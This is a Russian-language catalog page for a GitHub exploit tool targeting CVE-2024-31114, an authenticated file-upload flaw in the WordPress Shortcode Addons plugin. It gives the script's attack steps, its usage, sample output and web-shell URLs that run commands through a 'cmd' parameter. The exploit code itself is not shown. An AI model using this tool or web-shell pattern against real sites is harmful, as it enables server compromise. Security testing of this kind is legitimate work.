Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 — Произвольная загрузка файлов (требуется аутентификация: Admin+) | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-31114
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 — Произвольная загрузка файлов (требуется аутентификация: Admin+)

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

Shortcode Addons <= 3.2.5 – Аутентифицированная (Admin+) произвольная загрузка файлов
CVE ID: CVE-2024-31114
Оценка CVSS: 9.1 (Критическая)


🛠️ Описание уязвимости

Плагин Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов во всех версиях до 3.2.5 включительно.

Эта ошибка позволяет аутентифицированным злоумышленникам с уровнем доступа администратора или выше загружать произвольные файлы на сервер, что может привести к удалённому выполнению кода (RCE).


🚀 Описание скрипта

Этот Python-скрипт автоматизирует эксплуатацию уязвимости. Он выполняет:

  1. Отключение проверки SSL
  2. Вход с указанными учётными данными
  3. Извлечение CSRF-токена (_wpnonce)
  4. Генерацию PHP-шелла (nxploit.php)
  5. Сжатие и загрузку его в виде .zip
  • Подтверждение загрузки и доступ к шеллу
  • Выполнение whoami на целевой сервере

  • 🧪 Использование

    root@kitploit:~
    usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
    
    Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
    By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            Show this help message and exit
      -u, --url URL         Target URL (e.g. http://target.com)
      -un, --username USERNAME   WordPress Admin Username
      -p, --password PASSWORD    WordPress Admin Password
    

    📤 Пример вывода

    root@kitploit:~
    [+] Authentication successful.
    [+] _wpnonce extracted: 9d8dbbc630
    [+] Payload nxploit.zip created.
    [+] Payload uploaded.
    [+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
    [+] Command output:
    ------------------
    www-data
    ------------------
    [+] Temporary files removed.
    

    🐚 Использование веб-шелла

    После загрузки полезной нагрузки вы можете выполнять системные команды, используя следующий формат:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
    

    🔹 Пример:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
    

    Это выведет список содержимого текущего каталога на сервере.

    ⚠️ Отказ от ответственности

    Этот инструмент предназначен только для образовательных целей и авторизованного тестирования.
    Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим скриптом.

    Используйте ответственно и только на тех системах, на которые у вас есть явное разрешение на тестирование.


    Автор: Nxploited | Khaled Alenazi

    Скачать инструмент